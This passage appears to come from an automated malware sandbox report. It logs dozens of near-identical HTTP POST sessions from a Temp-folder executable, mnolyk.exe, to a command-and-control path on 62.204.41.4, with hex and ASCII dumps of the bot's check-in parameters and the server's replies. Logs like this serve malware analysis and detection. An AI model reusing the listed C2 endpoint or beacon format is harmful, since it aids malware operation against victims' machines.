                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      388192.168.2.75011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:43.857815981 CET848OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.923408031 CET848INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      389192.168.2.75011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:44.099591970 CET849OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.165404081 CET849INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      39192.168.2.74976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:07.067395926 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.132951021 CET471INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      390192.168.2.75011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:44.342001915 CET850OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.405376911 CET850INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      391192.168.2.75011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:44.576880932 CET851OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.641315937 CET851INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      392192.168.2.75012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:44.810266972 CET852OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.874505997 CET852INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      393192.168.2.75012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:45.046253920 CET853OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.113672972 CET853INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      394192.168.2.75012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:45.289416075 CET854OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.355281115 CET854INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      395192.168.2.75012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:45.530649900 CET855OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.594862938 CET855INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      396192.168.2.75012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:45.767097950 CET856OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.832027912 CET856INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      397192.168.2.75012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:46.016413927 CET857OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.083712101 CET857INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      398192.168.2.75012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:46.263726950 CET858OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.327986002 CET858INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      399192.168.2.75012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:46.506414890 CET859OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.570149899 CET859INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.74972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:57.036982059 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:57.103548050 CET436INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      40192.168.2.74976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:07.304244995 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.370210886 CET472INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      400192.168.2.75012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:46.748437881 CET860OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.816963911 CET860INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      401192.168.2.75012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:46.992346048 CET861OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.057813883 CET861INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      402192.168.2.75013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:47.251535892 CET862OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.316962004 CET862INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      403192.168.2.75013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:47.485008001 CET863OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.549081087 CET863INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      404192.168.2.75013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:47.847647905 CET864OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
